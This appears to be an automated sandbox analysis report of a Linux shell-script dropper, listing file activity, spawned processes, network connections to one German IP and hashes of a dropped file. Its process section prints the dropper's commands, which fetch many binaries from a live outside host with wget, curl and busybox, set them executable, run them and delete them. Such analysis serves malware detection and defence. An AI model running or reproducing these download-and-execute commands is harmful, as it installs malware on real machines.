File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97